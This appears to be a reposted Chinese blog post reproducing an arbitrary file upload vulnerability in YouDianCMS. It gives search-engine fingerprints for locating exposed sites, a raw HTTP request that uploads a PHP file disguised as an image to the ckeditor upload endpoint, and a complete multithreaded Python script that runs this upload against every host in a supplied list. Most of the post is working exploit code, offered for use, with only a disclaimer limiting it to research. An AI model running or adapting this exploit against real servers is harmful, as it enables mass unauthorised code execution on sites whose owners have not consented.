【漏洞复现】YouDianCMS友点系统任意文件上传漏洞【附POC】

admin

139110
文章

114
评论

2024年2月27日10:24:121 125 views字数 2437阅读8分7秒阅读模式

漏洞简介

YouDianCMS友点系统存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权限。

影响范围

Zoomeye:iconhash: "40d924d96b8903a41252bc0a8eb3f39b"

【漏洞复现】YouDianCMS友点系统任意文件上传漏洞【附POC】

复现过程

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1Host: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 185Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2 --cadc403efc1ad12f5fcce44c172baad2Content-Disposition: form-data; name="files"; filename="c.php"Content-Type: image/jpg <?php phpinfo();?>--cadc403efc1ad12f5fcce44c172baad2--

【漏洞复现】YouDianCMS友点系统任意文件上传漏洞【附POC】

批量POC

【漏洞复现】YouDianCMS友点系统任意文件上传漏洞【附POC】

获取POC

#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:MDSEC
# from:https://github.com/MD-SEC/MDPOCS
# fofa：icon_hash="-1629133697"
# zoomeye:iconhash: "40d924d96b8903a41252bc0a8eb3f39b"

import ssl
import sys
import requests
import csv
import urllib3
import hashlib
from concurrent.futures import ThreadPoolExecutor
urllib3.disable_warnings()
if len(sys.argv) != 2:
    print(
        '+----------------------------------------------------------------------------------------------------------+')
    print(
        '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
    print(
        '+----------------------------------------------------------------------------------------------------------+')
    print(
        '+ USE: python3 <filename> <hosts.txt>                                                                      +')
    print(
        '+ EXP: python3 YouDianCMS_image_upload_Upload_File_Poc.py url.txt                                         +')
    print(
        '+----------------------------------------------------------------------------------------------------------+')
    sys.exit()
proxysdata = {
'http': '127.0.0.1:8080'
}  
def exp(host):
    if "http" in host:
        url = host
    else:
        url ="http://"+host
    host1=url.replace("http://","")
    host2=host1.replace("https://","")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
        "Content-Type": "multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2",
        "Host": "%s" %host2
    }
    data ="""--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg

<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--
"""
    vulurl = url + "/Public/ckeditor/plugins/multiimage/dialogs/image_upload.php"
    try:
        r = requests.post(vulurl, headers=headers,data=data,verify=False)
        if  "imgurl" in r.text:
            json_dict=r.json()
            print(url+"/Public/"+json_dict["imgurl"])
        else:
            return 0
            print (host+":false")
    except:
        return 0
        print (host+":false")


if __name__ == '__main__':
    file = sys.argv[1]
    data = open(file)
    reader = csv.reader(data)
    with ThreadPoolExecutor(50) as pool:
        for row in reader:
            pool.submit(exp, row[0])

原文始发于微信公众号（猫蛋儿安全）：【漏洞复现】YouDianCMS友点系统任意文件上传漏洞【附POC】

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】YouDianCMS友点系统任意文件上传漏洞【附POC】

速达软件多款产品 doSavePrintTpl.action SQL注入漏洞

Erlang/OTP 严重 SSH 漏洞允许未认证的远程代码执行（CVE-2025-32433）

300 毫秒获取管理员权限：掌握 DLL 劫持和 Hook 技术（CVE-2025-24076/CVE-2025-24994）

【漏洞速递】PyTorch模型加载远程代码执行漏洞(CVE-2025-32434)

速达软件多款产品 doSavePrintTpl.action Struts2 远程代码执行漏洞

PyTorch反序列化远程代码执行漏洞CVE-2025-32434

OpenCMS任意文件读取漏洞 (CVE-2025-28099)

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

WP Shuffle plugin SQL注入漏洞及解决办法（CNVD-2025-06478、CVE-2025-28873）

广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞 POC

发表评论

在线咨询

微信